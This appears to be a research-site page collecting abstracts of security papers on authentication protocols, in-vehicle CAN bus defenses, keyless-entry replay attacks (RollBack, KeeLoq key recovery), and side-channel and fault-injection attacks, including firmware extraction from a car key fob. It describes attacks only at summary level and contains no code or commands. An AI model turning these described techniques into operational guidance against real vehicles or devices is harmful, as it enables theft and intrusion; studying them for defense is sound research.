While the 6G/IoT transition is on the cards, the real advantage of this transition can be realized only if user privacy and security are guaranteed. Smartcard and password based authentication protocols can help the transition in a rapid way. However, due to insecurities and/or heavy computation, many such protocols cannot cope with the dynamic requirements of future generation networks. Recently, Kaul and Awasthi presented a robust and secure user authentication protocol based on resource friendly symmetric cryptography primitives. They declared that their protocol is convenient, efficient, and secure for real-world applications. In contrast, this article shows that the protocol of Kaul and Awasthi is not secure, because an attacker can easily find the identity of a legal user that is being sent on the public channel. Further, by using the identity of a legitimate user, an attacker can impersonate a legitimate user of the system and enjoy the services given by the server. So, their protocol is susceptible to user impersonation attacks, and their claim of being secure is proven to be wrong. Therefore, we have extended their work and presented an upgraded scheme that ensures secure communication over the entire channel. Moreover, our proposed scheme is safe not only against the user impersonation attack but also against other major security attacks, with reasonable communication, computation, and storage costs, and is a better candidate for deployment in 6G/IoT networks.
... Information hackers target users to obtain important information through impersonation, and this trend is increasing rapidly [16]. They do so by re-programming the interfaces of the communication channels [11], [12], [13]. Thus, some of the major security techniques are not able to provide secure systems to the users. ...
Article
Full-text available
Protecting passwords is now a big challenge because users want to do all types of work online via user-friendly devices such as mobiles, tablets etc. Now, it is difficult to implement secure heavyweight algorithms such as AES, RSA etc. in hardware constrained devices. It has been observed that users want all types of security services in an online public environment. Authentication is the first and foremost step to enhance security. Various applications are available for real time authentication, such as keyless car entry and opening home doors through security algorithms under a remote keyless entry system (RKES). Now, it is the demand of the time to implement lightweight security algorithms without compromising security. In order to fulfill this challenge, this paper proposes a strong model for enhancing authentication security. In this work, strong authentication techniques are implemented with lightweight algorithms. This model received good comparison results.
Article
Full-text available
The Internet of Vehicles (IoV) is revolutionizing the automobile sector by allowing vehicles to interact with one another and with roadside infrastructure. The Controller Area Network (CAN) is a vital component of such smart vehicles, allowing communication between various Electronic Control Units (ECUs). However, the CAN protocol's intrinsic lack of security renders it open to a variety of cyber-attacks, posing substantial hazards to both safety and privacy. This research investigates the use of deep learning with a multi-layer perceptron to improve the security of CAN networks inside the IoV framework. We discuss current threats to CAN networks, including spoofing, replay, and denial-of-service attacks, and how deep learning may be used to identify and mitigate these threats efficiently. We propose a unique deep learning-based defense mechanism for real-time threat detection. The suggested method is highly effective in identifying and mitigating potential risks, as evidenced by extensive testing on real-world CAN datasets. Based on our findings, the proposed solution has the potential to considerably enhance the security of CAN networks in the Internet of Vehicles, making car communication systems more secure and reliable.
Chapter
This chapter discusses recent physical attacks on FPGAs, which can also be performed remotely from within the FPGA itself. Such attacks can be executed despite established secure isolation at the digital level. Although FPGAs are meant to implement digital logic, their underlying physical circuit properties can be exploited to implement special circuitry that is either sensitive to the data-dependent on-chip voltage fluctuations or can influence them. These capabilities break all previous assumptions on how secure FPGA virtualization can be implemented and lift physical fault and power analysis attacks from a local to a potentially remote attacker. This new attack type has implications on orders of magnitude more users, particularly in cloud platforms. To address this novel threat, this chapter presents countermeasures that can be deployed from the perspective of a cloud hypervisor.
Article
Automotive Keyless Entry (RKE) systems provide car owners with a degree of convenience, allowing them to lock and unlock the car without using a mechanical key. Today’s RKE systems implement disposable rolling codes, making every key fob button press unique, effectively preventing simple replay attacks. However, a prior attack called RollJam was proven to break all rolling code-based systems in general. By a careful sequence of signal jamming, capturing, and replaying, an attacker can become aware of the subsequent valid unlock signal that has not been used yet. RollJam, however, requires continuous deployment indefinitely until it is exploited. Otherwise, the captured signals become invalid if the key fob is used again without RollJam in place. We introduce RollBack, a new replay-and-resynchronize attack against most of today’s RKE systems. In particular, we show that even though the one-time code becomes invalid in rolling code systems, replaying a few previously captured signals consecutively can trigger a rollback-like mechanism in the RKE system. Put differently, the rolling codes become resynchronized back to a previous code used in the past from where all subsequent yet already used signals work again. Moreover, the victim can still use the key fob without noticing any difference before and after the attack. Unlike RollJam, RollBack does not necessitate jamming at all. In fact, it requires signal capturing only once and can be exploited at any time in the future as many times as desired. This time-agnostic property is particularly attractive to attackers, especially in car-sharing/renting scenarios where accessing the key fob is straightforward. However, while RollJam defeats virtually any rolling code-based system, vehicles might have additional anti-theft measures against malfunctioning key fobs, hence against RollBack. 
Our ongoing analysis (with crowd-sourced data) against different vehicle makes and models has revealed that ∼ 50% of the examined vehicles in the Asian region are vulnerable to RollBack, while the impact tends to be smaller in other regions like Europe and North America.
Chapter
Edge, fog, and Dew computing have emerged from cloud computing. The proponents of cloud computing say that this model gives a better experience to users. In order to use Dew computing, a user needs to install a DVM (Dew virtual machine) on his system. A Dew virtual machine is an isolated environment to run a Dew server on a local PC. It consists of a Dew server (DS), a Dew analytic server (DAS), and the artificial intelligence of Dew (AID). The Dew server is a cloud server on the local PC. The Dew analytic server collects information about how the DS is being used. AID takes data from the DS and presents it to the user such that it enhances the user experience. Based on the real-time application, many categories of Dew computing exist, e.g., Web in Dew, Software in Dew, Database in Dew, etc. Dew computing can also be used for IoT systems, which we may name "IoT-enabled Dew". As communication in these systems takes place over a public channel, many security concerns come into the picture when we use IoT in Dew. Thus, it is necessary to focus on authorization of data access, secure session establishment, and user privacy in order to have confidence in the system and data secrecy. As data is not under the computing control of cloud servers, security and authorized access rules remain a key concern in Dew. To ensure secure and authorized communication, an access control mechanism may help, which could be established between the device and the Dew server. As we include Dew in IoT systems, there is also a need to establish a secure session key between the sensor device and the user. In this chapter, we will discuss the security-related issues in Dew and present a discussion on the security concerns of Dew-assisted IoT systems and user privacy aspects. We will also provide the status of current Dew system security and future requirements. Keywords: Dew computing, Cloud computing, IoT, Authentication, Privacy, Security
Chapter
DryGASCON and Ascon are two similar authenticated encryption algorithms submitted to NIST's recently finalized lightweight cryptography competition. DryGASCON was eliminated after the second round, while Ascon won the competition and became the new lightweight cryptography standard. We analyze these two ciphers using differential-linear distinguishers to better understand their security. By using the parallel computing power of GPUs, we show that better distinguishers can be obtained experimentally in practice which cannot be obtained theoretically by known methods. We offer the best experimentally obtained 5-round differential-linear distinguishers for the permutations of Ascon and DryGASCON. We also provide related-key differential-linear attacks on 5-round Ascon. Keywords: Lightweight cryptography, Cryptanalysis, Differential-linear, NIST
Thesis
Full-text available
In this thesis, we address the problem of securing the communications of the sensor network inside a connected electric vehicle. Indeed, several studies and experiments have shown that various attacks can be carried out on this network, such as activating the brakes and taking remote control of the vehicle, eavesdropping attacks, DoS attacks on the ECUs (Electronic Control Units), etc. Security solutions for the intra-vehicle network exist, the best known being EVITA (E-safety vehicle intrusion protected applications), proposed within the Seventh Framework Programme for research and technological development. However, these security solutions are energy-hungry (they use the most robust security mechanisms) and are poorly suited to a context of energy constraints (electric vehicle). For this reason, we proposed a context-based security solution for the intra-electric-vehicle network. The context adapts to the ecosystem of the electric vehicle and is composed of the state of charge (SOC), the distance to the charging station, the traffic conditions, the sensor type, and the memory and processing capacity of the sensors. In CASIEV (Context Aware Security for the Intra Electric Vehicle), the sensor always switches to the highest security level allowed by the context. Thus, the security of communications can be ensured when the battery level is critical but the traffic is low/medium and the remaining energy makes it possible to reach the nearest available charging station. Simulation showed that CASIEV increases the time during which security is active compared to existing (static) solutions. Moreover, we noticed a waste of resources (energy, memory and processing) in the case where the risk level of attacks is low.
For this reason, we improved CASIEV by taking into account the risk level and the confidence in that risk. RICAV (RIsk based Context-Aware security solution for the intra electric Vehicle network) increased the activation time of the security system and reduced energy consumption while ensuring the safety of the driver.
Chapter
Modern automobiles are controlled via networked controls. The majority of these networks were built with minimal regard to security. Researchers have recently seen a variety of attacks on these systems, prompting them to share their data. This chapter discusses the weaknesses of the Controller Area Network (CAN) within the in-automobile communication protocol and several possible attacks that may be used against it. In addition, we present recent security detection schemes that have been offered in the current level of research to counteract the threats. The primary purpose of this study is to showcase an integrated technique known as an intrusion detection system (IDS). It has been a significant instrument in protecting information and network systems for decades. Therefore, we have presented a detailed literature review examining existing IDS. For the investigation of IDS, we considered the following aspects: approaches used for detection, strategies used for deployment, attack mechanisms, and technical issues and challenges. We classify and compare current IDS approaches based on criteria such as real-time limitations, hardware types, CAN bus behavior changes, attack mitigation types, and software/hardware used to validate these systems. Similarly, other scholars will be encouraged to pursue IDS research on the CAN bus system as a result of the current study.
Article
Recently, Akram et al. (2021) proposed a drones-access protocol for monitoring urban security. Akram et al. claimed that their protocol is secure and can resist known security attacks. However, in this comment article, we demonstrate that their protocol is still vulnerable to drone capture attacks and stolen-verifier attacks. In addition, their protocol does not provide perfect forward secrecy. Finally, we present an improved protocol to manage the security weaknesses we found.
Article
Full-text available
Worldwide growth in electric vehicle use is prompting new installations of private and public electric vehicle supply equipment (EVSE). EVSE devices support the electrification of the transportation industry but also represent a linchpin for power systems and transportation infrastructures. Cybersecurity researchers have recently identified several vulnerabilities that exist in EVSE devices, communications to electric vehicles (EVs), and upstream services, such as EVSE vendor cloud services, third party systems, and grid operators. The potential impact of attacks on these systems stretches from localized, relatively minor effects to long-term national disruptions. Fortunately, there is a strong and expanding collection of information technology (IT) and operational technology (OT) cybersecurity best practices that may be applied to the EVSE environment to secure this equipment. In this paper, we survey publicly disclosed EVSE vulnerabilities, the impact of EV charger cyberattacks, and proposed security protections for EV charging technologies.
Chapter
We investigate the susceptibility of the Texas Instruments SimpleLink platform microcontrollers to non-invasive physical attacks. We extracted the ROM bootloader of these microcontrollers and then analysed it using static analysis augmented with information obtained through emulation. We demonstrate a voltage fault injection attack targeting the ROM bootloader that allows enabling debug access on a previously locked microcontroller within seconds. Information provided by Texas Instruments reveals that one of our voltage fault injection attacks abuses functionality that is left over from the integrated circuit manufacturing process. The demonstrated physical attack allows an adversary to extract the firmware (i.e. intellectual property) and to bypass secure boot. Additionally, we mount side-channel attacks and differential fault analysis attacks on the hardware AES co-processor. To demonstrate the practical applicability of these attacks we extract the firmware from a Tesla Model 3 key fob. This paper describes a case study covering Texas Instruments SimpleLink microcontrollers. Similar attack techniques can be, and have been, applied to microcontrollers from other manufacturers. The goal of our work is to document our analysis methodology and to ensure that system designers are aware of these vulnerabilities. They will then be able to take these into account during the product design phase. All identified vulnerabilities were responsibly disclosed. Keywords: SimpleLink, Firmware recovery, Fault injection, Side-channel analysis
Article
Full-text available
With the rapid developments in technology, intelligent transportation vehicles, whose use is increasing rapidly today, will soon hold an important place worldwide due to growing demand and the conveniences they provide. It cannot be ignored that technological developments in the field of intelligent and autonomous transportation vehicles have gained rapid momentum. With the emergence of semi-autonomous and autonomous cars that make use of advanced machine learning and artificial intelligence techniques, potential risks and cybersecurity challenges are increasing. Moreover, the Vehicle-to-Vehicle (V2V) and Vehicle-to-Infrastructure (V2I) interfaces required for the deployment of intelligent transportation systems and autonomous vehicles further increase the security risks, as they greatly expand the potential attack surface and attack vectors. Although these vehicles, operated by artificial intelligence and software, increase driver safety and comfort, they can also cause large-scale loss of life and property due to external cyberattacks. Therefore, it becomes extremely important to analyze the threats and cybersecurity risks related to intelligent transportation vehicles and to put forward security measures to address these risks, taking into account the characteristics of this highly complex, heterogeneous and variable environment. This study attempts to explain and analyze cybersecurity attacks on intelligent transportation vehicles, the consequences that may arise, and the security measures that can be taken. In addition, the multi-layered defense system used in these systems was examined and evaluated.
Article
Up till now, numerous authentication and key agreement schemes have been proposed for ubiquitous networks. Recently, Arshad and Rasoolzadegan also proposed an authentication and key agreement scheme for ubiquitous networks with user anonymity. However, we determined that Arshad and Rasoolzadegan's scheme has the following flaws: (1) the login phase is inefficient, which may lead to server resource exhaustion attacks; (2) the password change phase is inefficient and not user-friendly; and (3) the revocation phase, needed when the mobile device is lost, and the re-registration phase are absent. Therefore, we propose an improved scheme that successfully removes all of the previously mentioned flaws existing in Arshad and Rasoolzadegan's protocol by using biometric based authentication. Formal analysis of the proposed scheme is conducted using the random oracle model, and heuristic analysis is also conducted to demonstrate that the proposed scheme fulfills all of the security requirements. In addition, the proposed scheme is validated by the Automated Validation of Internet Security Protocols and Applications (AVISPA) tool. Moreover, computational and communication cost comparisons indicate that our improved scheme is more suitable for ubiquitous networks.
Chapter
In the past decade, the Internet of Things (IoT) has emerged as a wonder-pill to our problems. This chapter gives an overview of physical security threats and protection mechanisms of low-end IoT devices, focusing on side-channel analysis (SCA) and fault analysis attacks. It concentrates on remote attestation (RA) techniques, that aim at detecting malicious changes in the device’s firmware by requesting a proof to verify the sanity of the device. RA is a security protocol that runs between a trusted party called Verifier and “potentially” untrusted party called Prover. Primarily, RA techniques can be subdivided into three main categories: software-based RA; hardware-based RA, and hybrid architecture-based RA. The chapter discusses challenges that IoT malware poses on IoT systems and introduces state-of-the-art intrusion detection approaches for IoT networks for coping with such threats.
Chapter
Efficient implementation of Boolean masking in terms of low latency has evolved into a hot topic due to the necessity of embedding a physically secure and at-the-same-time fast implementation of cryptographic primitives in e.g., the memory encryption of pervasive devices. Instead of fully minimizing the circuit’s area and randomness requirements at the cost of latency, the focus has changed into finding optimal tradeoffs between the circuit area and the execution time. The main latency bottleneck in hardware masking lies in the need for registers to stop the propagation of glitches and maintain non-completeness. Usually, an exponentially growing number of shares (hence an extremely large circuit), as well as a high demand for fresh randomness, are the result of avoiding registers in a securely masked hardware implementation of a block cipher. In this paper, we present several first-order secure and low-latency implementations of PRINCE. In particular, we show how to realize the masked variant of round-based PRINCE with only a single register stage per cipher round. We compare the resulting architectures, based on the popular TI and GLM masking scheme based on the area, latency, and randomness requirements and point out that both designs are suited for specific use cases.
Chapter
We complete the state-of-the-art on the side-channel security of real-world devices by analysing two 32-bit microcontrollers equipped with an unprotected co-processor. Our results show that (i) the lack of understanding of their hardware architecture can be circumvented with standard detection tools – for this purpose, we combine a simple variation of the Test Vector Leakage Assessment methodology with Signal-to-Noise Ratio estimations, which enables the efficient identification of attack vectors; (ii) standard distinguishers then lead to powerful key recoveries with less than 5,000 traces; and (iii) preprocessing like the continuous wavelet transform can be useful in such a black box evaluation context.
Article
Nowadays, lightweight cryptography attracts academicians, scientists and researchers to concentrate on its requisite with the increasing usage of low resource devices. In this paper, a new lightweight image encryption scheme is proposed using the Lorenz 3D super chaotic map. This encryption scheme is an addition–rotation–XOR block cipher designed for its supremacy, efficacy and speed execution. In this addition–rotation–XOR cipher, the equation for Lorenz 3D chaotic map is iteratively solved to generate double valued signals in a speedy manner using the Runge–Kutta and Euler methods. The addition, rotation and diffusion sequences are generated from the double valued signals, and the source pixels of the 8-bit plain test images are manipulated with the addition, rotation and diffusion of the bytes. Finally, the cipher images are constructed from the manipulated pixels and evaluated with various statistical as well as randomness tests. The results from various tests prove that the proposed chaotic addition–rotation–XOR block image cipher is efficient in terms of randomness and speed.
Article
Full-text available
Fog computing (FC) is an infrastructure consisting of decentralized computing, where computing resources such as storage, applications, and data are scattered among the cloud and data source. Fog computing inherits similar privacy and security concerns present in cloud computing, such as authentication and key management issues. Recently, Wazid et al. presented a scheme of authentication key exchange for fog computing called SAKA-FC to address these issues. We analyzed and identified that the SAKA-FC suffers from some severe vulnerabilities. Furthermore, we presented an improved scheme to mitigate these problems while retaining its strengths. The formal security analysis of the proposed scheme is validated through BAN logic. At the same time, the AVISPA tool is employed for automated formal security verification. Informal security analysis is conducted to attest that the proposal can confront the known attacks. Using computation and communication costs as the metrics, the proposed scheme is also compared with some state-of-the-art schemes. The proposed scheme achieves the same communication cost as SAKA-FC, whereas the difference in computation cost is 24%. This increase in computation cost is justifiable as the proposal is resistant to clogging attacks and provides better security than the prior schemes.
Preprint
The continuing use of proprietary cryptography in embedded systems across many industry verticals, from physical access control systems and telecommunications to machine-to-machine authentication, presents a significant obstacle to black-box security-evaluation efforts. In-depth security analysis requires locating and classifying the algorithm in often very large binary images, thus rendering manual inspection, even when aided by heuristics, time consuming. In this paper, we present a novel approach to automate the identification and classification of (proprietary) cryptographic primitives within binary code. Our approach is based on Data Flow Graph (DFG) isomorphism, previously proposed by Lestringant et al. Unfortunately, their DFG isomorphism approach is limited to known primitives only, and relies on heuristics for selecting code fragments for analysis. By combining the said approach with symbolic execution, we overcome all limitations of their work, and are able to extend the analysis into the domain of unknown, proprietary cryptographic primitives. To demonstrate that our proposal is practical, we develop various signatures, each targeted at a distinct class of cryptographic primitives, and present experimental evaluations for each of them on a set of binaries, both publicly available (and thus providing reproducible results), and proprietary ones. Lastly, we provide a free and open-source implementation of our approach, called Where's Crypto?, in the form of a plug-in for the popular IDA disassembler.
Article
Full-text available
Due to the limitations of symmetric-key techniques, authentication and key agreement (AKA) protocols based on public-key techniques have attracted much attention, providing secure access and communication mechanism for various application environments. Among these public-key techniques used for AKA protocols, chaotic-map is more effective than scalar multiplication and modular exponentiation, and it offers a list of desirable cryptographic properties such as un-predictability, un-repeatability, uncertainty and higher efficiency than scalar multiplication and modular exponentiation. Furthermore, it is usually believed that three-factor AKA protocols can achieve higher security level than single- and two-factor protocols. However, none of existing three-factor AKA protocols can meet all security requirements. One of the most prevalent problems is how to balance security and usability, and particularly how to achieve truly three-factor security while providing password change friendliness. To deal with this problem, in this paper we put forward a provably secure three-factor AKA protocol based on extended chaotic-maps for mobile lightweight devices, by adopting the techniques of "Fuzzy-Verifiers" and "Honeywords". We prove the security of the proposed protocol in the random oracle model, assuming the intractability of extended chaotic-maps Computational Diffie-Hellman problem. We also simulate the protocol by using the AVISPA tool. The security analysis and simulation results show that our protocol can meet all 13 evaluation criteria regarding security. We also assess the performance of our protocol by comparing with seven other related protocols. The evaluation results demonstrate that our protocol offers better balance between security and usability over state-of-the-art ones.
Conference Paper
Full-text available
Recently a new class of collision attacks which was originally suggested by Hans Dobbertin has been introduced. These attacks use side channel analysis to detect internal collisions and are generally not restricted to a particular cryptographic algorithm. As an example, a collision attack against DES was proposed which combines internal collisions with side channel information leakage. It had not been obvious, however, how this attack applies to non-Feistel ciphers with bijective S-boxes such as the Advanced Encryption Standard (AES). This contribution takes the same basic ideas and develops new optimized attacks against AES. Our major finding is that the new combined analytical and side channel approach reduces the attack effort compared to all other known side channel attacks. We develop several versions and refinements of the attack. First we show that key dependent collisions can be caused in the output bytes of the mix column transformation in the first round. By taking advantage of the birthday paradox, it is possible to cause a collision in an output with as few as 20 measurements. If a SPA leak is present from which collisions can be determined with certainty, then each collision will reveal at least 8 bits of the secret key. Furthermore, in an optimized attack, it is possible to cause collisions in all four output bytes of the mix column transformation with an average of only 31 measurements, which results in knowledge of all 32 key bits. Finally, if collisions are caused in all four columns of the AES in parallel, it is possible to determine the entire 128-bit key with only 40 measurements, which is a distinct improvement compared to DPA and other side channel attacks. Keywords: AES, side channel attacks, internal collisions, birthday paradox.
Conference Paper
Full-text available
During the last years, several masking schemes for AES have been proposed to secure hardware implementations against DPA attacks. In order to investigate the effectiveness of these countermeasures in practice, we have designed and manufactured an ASIC. The chip features an unmasked and two masked AES-128 encryption engines that can be attacked independently. In addition to conventional DPA attacks on the output of registers, we have also mounted attacks on the output of logic gates. Based on simulations and physical measurements we show that the unmasked and masked implementations leak side-channel information due to glitches at the output of logic gates. It turns out that masking the AES S-Boxes does not prevent DPA attacks, if glitches occur in the circuit.
Conference Paper
Full-text available
A classical model is used for the power consumption of cryptographic devices. It is based on the Hamming distance of the data handled with regard to an unknown but constant reference state. Once validated experimentally it allows an optimal attack to be derived called Correlation Power Analysis. It also explains the defects of former approaches such as Differential Power Analysis. Keywords: Correlation factor, CPA, DPA, Hamming distance, power analysis, DES, AES, secure cryptographic device, side channel.
Conference Paper
Full-text available
Field Programmable Gate Arrays (FPGAs) are becoming increasingly popular, especially for rapid prototyping. For implementations of cryptographic algorithms, not only the speed and the size of the circuit are important, but also their security against implementation attacks such as side-channel attacks. Power-analysis attacks are typical examples of side-channel attacks, that have been demonstrated to be effective against implementations without special countermeasures. The flexibility of FPGAs is an important advantage in real applications but also in lab environments. It is therefore natural to use FPGAs to assess the vulnerability of hardware implementations to power-analysis attacks. To our knowledge, this paper is the first to describe a setup to conduct power-analysis attacks on FPGAs. We discuss the design of our hand-made FPGA-board and we provide a first characterization of the power consumption of a Virtex 800 FPGA. Finally we provide strong evidence that implementations of elliptic curve cryptosystems without specific countermeasures are indeed vulnerable to simple power-analysis
Conference Paper
Full-text available
Cryptanalysis of symmetric and asymmetric ciphers is computationally extremely demanding. Since the security parameters (in particular the key length) of almost all practical crypto algorithms are chosen such that attacks with conventional computers are computationally infeasible, the only promising way to tackle existing ciphers (assuming no mathematical breakthrough) is to build special-purpose hardware. Dedicating those machines to the task of cryptanalysis holds the promise of a dramatically improved cost-performance ratio so that breaking of commercial ciphers comes within reach. This contribution presents the design and realization of the COPACOBANA (Cost-Optimized Parallel Code Breaker) machine, which is optimized for running cryptanalytical algorithms and can be realized for less than US$ 10,000. It will be shown that, depending on the actual algorithm, the architecture can outperform conventional computers by several orders of magnitude. COPACOBANA hosts 120 low-cost FPGAs and is able to, e.g., perform an exhaustive key search of the Data Encryption Standard (DES) in less than nine days on average. As a real-world application, our architecture can be used to attack machine readable travel documents (ePass). COPACOBANA is intended, but not necessarily restricted to solving problems related to cryptanalysis. The hardware architecture is suitable for computational problems which are parallelizable and have low communication requirements. The hardware can be used, e.g., to attack elliptic curve cryptosystems and to factor numbers. Even though breaking full-size RSA (1024 bit or more) or elliptic curves (ECC with 160 bit or more) is out of reach with COPACOBANA, it can be used to analyze cryptosystems with a (deliberately chosen) small bitlength to provide reliable security estimates of RSA and ECC by extrapolation.
Article
Full-text available
KeeLoq is a lightweight block cipher with a 32-bit block size and a 64-bit key. Despite its short key size, it is used in remote keyless entry systems and other wireless authentication applications. For example, there are indications that authentication protocols based on KeeLoq are used, or were used by various car manufacturers in anti-theft mechanisms. This paper presents a practical key recovery attack against KeeLoq that requires 2^16 known plaintexts and has a time complexity of 2^44.5 KeeLoq encryptions. It is based on the principle of slide attacks and a novel approach to meet-in-the-middle attacks. We investigated the way KeeLoq is intended to be used in practice and conclude that our attack can be used to subvert the security of real systems. In some scenarios the adversary may even reveal the master secret used in an entire class of devices from attacking a single device. Our attack has been fully implemented. We have built a device that can obtain the data required for the attack in less than 100 minutes, and our software experiments show that, given the data, the key can be found in 7.8 days of calculations on 64 CPU cores.
Conference Paper
Full-text available
KeeLoq is a block cipher used in wireless devices that unlock the doors and alarms in cars manufactured by Chrysler, Daewoo, Fiat, GM, Honda, Jaguar, Toyota, Volvo, Volkswagen, etc [8,9,33,34]. KeeLoq is inexpensive to implement and economical in gate count, yet according to Microchip [33] it should have “a level of security comparable to DES”. In this paper we present several distinct attacks on KeeLoq, each of which is interesting for different reasons. First we show that when about 2^32 known plaintexts are available, KeeLoq is very weak and for example for 30% of all keys the full key can be recovered with complexity of 2^28 KeeLoq encryptions. Then we turn our attention to algebraic attacks with the major challenge of breaking KeeLoq given potentially a very small number of known plaintexts. Our best “direct” algebraic attack can break up to 160 rounds of KeeLoq. Much better results are achieved in combination with slide attacks. Given about 2^16 known plaintexts, we present a slide-algebraic attack that uses a SAT solver with the complexity equivalent to about 2^53 KeeLoq encryptions. To the best of our knowledge, this is the first time that a full-round real-life block cipher is broken using an algebraic attack.
Conference Paper
We present template attacks, the strongest form of side channel attack possible in an information theoretic sense. These attacks can break implementations and countermeasures whose security is dependent on the assumption that an adversary cannot obtain more than one or a limited number of side channel samples. They require that an adversary has access to an identical experimental device that he can program to his choosing. The success of these attacks in such constraining situations is due to the manner in which noise within each sample is handled. In contrast to previous approaches which viewed noise as a hindrance that had to be reduced or eliminated, our approach focuses on precisely modeling noise, and using this to fully extract information present in a single sample. We describe in detail how an implementation of RC4, not amenable to techniques such as SPA and DPA, can easily be broken using template attacks with a single sample. Other applications include attacks on certain DES implementations which use DPA-resistant hardware and certain SSL accelerators which can be attacked by monitoring electromagnetic emanations from an RSA operation even from distances of fifteen feet.
Article
Since their publication in 1998 and 2001 respectively, Power and Electromagnetic Analysis (SPA, DPA, EMA) have been successfully used to retrieve secret information stored in cryptographic devices. Both attacks usually model the side-channel leakages using the so-called "Hamming weight" and "Hamming distance" models, i.e. they only consider the number of bit transitions in a device as an image of its leakage. In these models, the main difference between power and electromagnetic analysis is assumed to be the fact that the latter allows space localization (i.e. to observe the leakage of only a part of the cryptographic device). In this paper, we make use of a more accurate leakage model for CMOS devices and investigate its consequences. In particular, we show that it is practically feasible to distinguish between 0 → 1 and 1 → 0 bit transitions in certain implementations and that electromagnetic analysis is particularly efficient in this respect. We denote this model as the "switching distance" leakage model and show how it may be very helpful to defeat some commonly used countermeasures (e.g. data buses precharged with random values). Then, we compare the different models and stress their respective constraints/advantages regarding practical attacks.
Article
Cryptosystem designers frequently assume that secrets will be manipulated in closed, reliable computing environments. Unfortunately, actual computers and microchips leak information about the operations they process. This paper examines specific methods for analyzing power consumption measurements to find secret keys from tamper resistant devices. We also discuss approaches for building cryptosystems that can operate securely in existing hardware that leaks information. Keywords: differential power analysis, DPA, SPA, cryptanalysis, DES. 1 Background: Attacks that involve multiple parts of a security system are difficult to predict and model. If cipher designers, software developers, and hardware engineers do not understand or review each other's work, security assumptions made at each level of a system's design may be incomplete or unrealistic. As a result, security faults often involve unanticipated interactions between components designed by different people. Many techniques ...